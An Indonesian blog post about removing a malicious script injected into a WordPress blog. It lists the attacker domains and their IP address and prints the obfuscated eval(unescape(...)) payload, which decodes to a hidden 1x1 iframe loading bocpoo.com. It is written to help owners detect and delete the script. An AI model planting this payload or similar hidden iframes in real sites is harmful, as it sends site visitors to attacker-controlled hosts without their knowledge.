Setelah cari di embah google, ternyata eh ternyata.. alamat ini memang sengaja dipasang di blog oleh seseorang sebagai penyerang dan mencoba menyisipkan scrip. Jadi jika blog anda memanggil alamat ini : artode .com, astnop .com, awotbop .com, baaswer .com, bedfer .com, biawwer .com, bocpoo .com, cedfer .com, chutnot .com, qawfer .com, geezter .com, podfer .com, pukfer .com
anda harus curiga bahwa blog anda memang disusupi scrip jahat. Dan semua alamat ini menuju ke satu IP 121 .156 .57 .184 yang servernya berada di Korea Selatan. Sedangkan semua alamat website diatas terdaftar atas nama Nikenin from Rostov na Donu, Russia.
Nah, lalu bagaimana mengatasinya? Caranya yaitu dengan mencari scrip ini dan menghapusnya.
<script>e val(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6F%63%70%6F%6F%2E%63%6F%6D%2F%3F%37%30%35%38%39%30%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
Ketika scrip diatas diloading pada browser yang membuka halaman utama blog kita, secara otomatis scrip ini dijalankan :<iframe src="http://bocpoo.com/?705890" width=1 height=1></iframe>
Dan kebetulan ketika saya mencari scrip ini, saya membuka main page (index.php) pada thema yang dipakai oleh wordpress. Jadi ga terlalu pusing meriksa semua halamanUntuk test apakah blog anda terkena sang penyusup atau tidak, anda bisa cek di website
http://www.unmaskparasites.com
0 komentar:
Posting Komentar